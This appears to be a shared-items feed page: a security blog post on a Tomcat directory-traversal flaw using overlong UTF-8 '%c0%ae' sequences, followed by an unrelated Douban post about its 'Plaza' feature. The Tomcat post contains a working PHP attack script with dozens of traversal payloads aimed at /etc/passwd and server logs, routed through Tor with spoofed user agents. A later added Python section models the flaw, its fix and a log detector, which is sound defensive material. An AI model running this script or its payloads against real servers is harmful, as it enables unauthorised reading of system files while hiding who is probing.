Exploiting Apache Tomcat » 0x000000 Security » Items shared by 车东 in Google Reader
You might have seen the new Apache Tomcat <= 6.0.18 vulnerability found by Simon Ryeo [1]. It is a directory traversal caused by the way Tomcat processed UTF-8 encoded URIs: %c0%ae is an overlong (non-shortest-form) UTF-8 encoding of '.', so %c0%ae%c0%ae does not look like '..' when Tomcat normalises the percent-decoded path, but the JVM's UTF-8 decoder, which wrongly accepted overlong forms, turns it into '..' when the path is converted to characters and mapped to a file. Two settings have to be in place: URIEncoding="UTF-8" on the Connector in server.xml, and allowLinking="true" on the Context (in context.xml or server.xml), which skips the canonical-path check that would otherwise notice the resolved file lies outside the web application's docBase. Curiously enough, that combination is common on *NIX systems, although neither value is Tomcat's default (URIEncoding defaults to ISO-8859-1 and allowLinking to false), so both must have been set by hand. Ah, the joy of standards! I don't know what is happening at Apache, but Tomcat is quite often vulnerable. It isn't the first time you've seen this.

So let's exploit *cough* test it:

<?php
// Probe script from the post, cleaned up: requests a list of traversal paths
// built from %c0%ae%c0%ae (overlong UTF-8 "..") segments and prints whatever
// comes back with HTTP 200. Only run it against hosts you are authorised to test.

// Target host; www.google.com is the post's placeholder, replace it.
$url = "http://www.google.com";

// Each entry climbs one to six directories with overlong-encoded ".." and then
// names a file worth reading: /etc/passwd or the web server's access/error logs.
$dir = array(
"%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/error_log",
"%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/error_log"
);

// Fetch one URL through the local proxy with a randomised User-Agent.
// Returns the raw response (headers and body) when the server answers 200,
// otherwise a one-line "Fail!" marker with the status code (0 if the
// connection or proxy failed).
function wrap($url){

    $ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
    $op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');
    $agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';

    // proxy: 127.0.0.1:8118 is the usual Privoxy-to-Tor listener
    $tor = '127.0.0.1:8118';
    $timeout = 300;
    $ack = curl_init();
    curl_setopt($ack, CURLOPT_PROXY, $tor);
    curl_setopt($ack, CURLOPT_URL, $url);
    curl_setopt($ack, CURLOPT_HEADER, 1);          // keep response headers in the output
    curl_setopt($ack, CURLOPT_USERAGENT, $agent);
    curl_setopt($ack, CURLOPT_RETURNTRANSFER, 1);  // return the body instead of printing it
    curl_setopt($ack, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ack, CURLOPT_TIMEOUT, $timeout);

    $syn = curl_exec($ack);
    $info = curl_getinfo($ack);
    curl_close($ack);

    // A 200 only means something was served; read the body to confirm it is
    // the file you asked for and not a default page.
    if ($info['http_code'] == 200) {
        return $syn;   // the original had an unreachable die() after this return
    }
    return "Fail! :".$info['http_code']."\r\n";
}

// Tomcat's default HTTP connector listens on 8080. Every probe is sent
// relative to "/", i.e. through the ROOT context, which is the one that
// needs allowLinking="true" for the traversal to reach the filesystem.
foreach ($dir as $path) {
    echo wrap($url.":8080/".$path);
}

?>

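The explanation at the top of the post comes down to an ordering problem: the '..' check runs on percent-decoded bytes, and the bytes-to-characters step that turns the overlong %c0%ae into '.' runs afterwards. The following is an added example written for this page (it is not code from the 0x000000 post, nor Tomcat's own CoyoteAdapter logic, which it simplifies to a few functions). It models both orderings in Python: the vulnerable one with a lenient decoder that accepts overlong forms, the hardened one that decodes strictly before normalising, and a small detector that flags overlong %c0/%c1 sequences in access-log lines. The lenient decoder, the pipeline functions and the log lines are assumptions constructed for illustration.

```python
"""
Added example for CVE-2008-2938's decode/normalise ordering.
Not from the original post and not Tomcat's code; the pipelines below are
simplified models built for this page.
"""
import re
from typing import List, Optional
from urllib.parse import unquote_to_bytes


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8 without rejecting overlong forms (modelled on the old JVM
    behaviour the advisory describes; an assumption, not the JVM's code).

    The code point is assembled from lead and continuation bits only, so
    C0 AE -> (0x00 << 6) | 0x2E = U+002E '.'. A conforming decoder rejects
    C0/C1 lead bytes outright because they can only start overlong forms.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            cp, extra = b, 0
        elif b & 0xE0 == 0xC0:
            cp, extra = b & 0x1F, 1
        elif b & 0xF0 == 0xE0:
            cp, extra = b & 0x0F, 2
        elif b & 0xF8 == 0xF0:
            cp, extra = b & 0x07, 3
        else:
            raise ValueError("invalid lead byte 0x%02x" % b)
        if i + extra >= len(data):
            raise ValueError("truncated multi-byte sequence")
        for j in range(1, extra + 1):
            cb = data[i + j]
            if cb & 0xC0 != 0x80:
                raise ValueError("invalid continuation byte 0x%02x" % cb)
            cp = (cp << 6) | (cb & 0x3F)
        out.append(chr(cp))
        i += extra + 1
    return "".join(out)


def normalize_segments(segments, dot, dotdot):
    """Resolve '.' and '..' segments; return None when '..' would climb above
    the context root, which is the case a server must refuse."""
    stack = []
    for seg in segments:
        if not seg or seg == dot:
            continue
        if seg == dotdot:
            if not stack:
                return None
            stack.pop()
        else:
            stack.append(seg)
    return stack


def vulnerable_pipeline(raw_uri: str) -> Optional[str]:
    """Vulnerable order: %xx-decode to bytes, check '..' on the BYTES, then
    convert to characters leniently. C0 AE C0 AE is not b'..' at check time
    but becomes '..' afterwards; with allowLinking="true" nothing re-checks."""
    raw = unquote_to_bytes(raw_uri)
    segs = normalize_segments(raw.split(b"/"), b".", b"..")
    if segs is None:
        return None
    return "/" + lenient_utf8_decode(b"/".join(segs))


def hardened_pipeline(raw_uri: str) -> Optional[str]:
    """Hardened order: strict character decode first (Python's codec rejects
    overlong forms, which a server would answer with 400), then normalise."""
    raw = unquote_to_bytes(raw_uri)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    segs = normalize_segments(text.split("/"), ".", "..")
    if segs is None:
        return None
    return "/" + "/".join(segs)


# %c0 and %c1 can never begin a valid UTF-8 sequence, so any %c0%xx or %c1%xx
# in a request line is an overlong-encoding probe.
OVERLONG_2BYTE = re.compile(r"%c[01]%[0-9a-f]{2}", re.IGNORECASE)

# Constructed access-log lines (Tomcat "common" pattern); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Aug/2008:15:48:01 +0000] "GET /index.jsp HTTP/1.1" 200 512',
    '10.0.0.9 - - [13/Aug/2008:15:48:02 +0000] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1432',
    '10.0.0.9 - - [13/Aug/2008:15:48:03 +0000] "GET /%2e%2e/etc/passwd HTTP/1.1" 400 0',
    '10.0.0.9 - - [13/Aug/2008:15:48:04 +0000] "GET /caf%C3%A9.html HTTP/1.1" 200 200',
]


def flag_overlong_requests(lines: List[str]) -> List[str]:
    """Return the log lines whose request contains an overlong 2-byte form.
    Well-formed non-ASCII (%C3%A9) is left alone."""
    return [line for line in lines if OVERLONG_2BYTE.search(line)]


if __name__ == "__main__":
    probe = "/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
    print("vulnerable:", vulnerable_pipeline(probe))   # /../../etc/passwd
    print("hardened  :", hardened_pipeline(probe))     # None (rejected)
    for line in flag_overlong_requests(SAMPLE_LOG):
        print("flagged   :", line)
```

The plain %2e%2e probe is refused by both orderings, which is why the post's list uses only the overlong form; the fix is the same in any server: decode to characters strictly, reject malformed input, and only then normalise and map the path.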

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
15:48 Douban's decentralization, part 2: Plaza » 豆瓣blog (Douban blog)

Douban Plaza

The blog post in February about Douban's decentralization ended like this:

We are also looking for a more effective replacement for the hot lists and most-popular reviews. Douban's primary purpose is to help you discover things you do not yet know. This is a challenging task: a Douban with no public square at all would confine our view to our own existing interests and those of our circle of friends, while a single square shared by everyone is becoming useless. We already have quite a few ideas and are confident about the result. It will be an exciting process of change, and I can't wait.

Over the past six months, Douban's decentralization has moved ahead decisively: diaries, albums, recommendations, local events... all now spread through the friends' broadcast feed. Today, as long as a member has one or two active friends, the content they create can spread quickly through the friend network and attract hundreds or thousands of readers, even without the home page or groups. The new "friendly groups" relationship also balances the tension between groups needing to stay separate and needing to communicate.

So, have we found that "more effective replacement for the hot lists and most-popular reviews"?

We have. Douban is about to launch the "Plaza" feature.

Plaza is a daily digest of the hot content Douban members pay the most attention to: books, films, music, reviews, diaries, albums, blog posts, events. Using a trending algorithm, the content that draws the most attention from Douban members will appear in Plaza automatically, refreshed at regular intervals. People who do not yet have a circle of friends, people who occasionally care about public topics, and people who want to broaden their interests can all use Plaza to quickly find useful content and like-minded people. Plaza will replace many things on Douban: the home-page reviews, the "most popular reviews" sections scattered everywhere, and the various 九点 (Douban 9) editions. You can think of Plaza as a super home-page reviews section.

Wait, isn't this the opposite of "decentralization"? What about all the drawbacks of hot lists mentioned in the previous post? Easy. Plaza is not on the home page; it is the last item in the navigation menu. If you do not want to see trending content, you can simply never visit Plaza and keep following your own interests and circles.

More importantly, there is not just one Plaza. There are four. Four plazas, for four different groups of people. Whichever one you like, just move in; the others you can ignore. That "ignoring" is exactly what Plaza was designed for.

That way, the literary scholars and the snarling post-punks need not look down on each other, and the American-TV buffs need not get tangled up with the food gurus. "Old" users who feel Douban has become too noisy and their kind has been diluted can have a corner of their own; the bargain-hunting compulsives who rally their friends every week to sweep the malls will not feel they have walked into the wrong place the moment they step out of their group. Douban is a city where everyone sees it their own way.

(The idea of multiple plazas carries over the concept and the technical groundwork of the 九点 aggregation editions. After almost two years, 九点's approach of aggregating "by audience rather than by content" remains an innovation with no successors. Plaza, though, will be more intuitive and more powerful.)

With Plaza, Douban's decentralization process comes to a close. For a site like Douban, whose purpose is discovery, a design centred entirely on personal interests and friend circles is incomplete. Plaza is a complement. But the individual remains Douban's first centre. With "most popular reviews" removed, Douban's home page can finally be a pure personal content management centre, and Douban's structure can be greatly simplified. But that is a topic for the next blog post.


<== 2008-08-13
==> 2008-08-15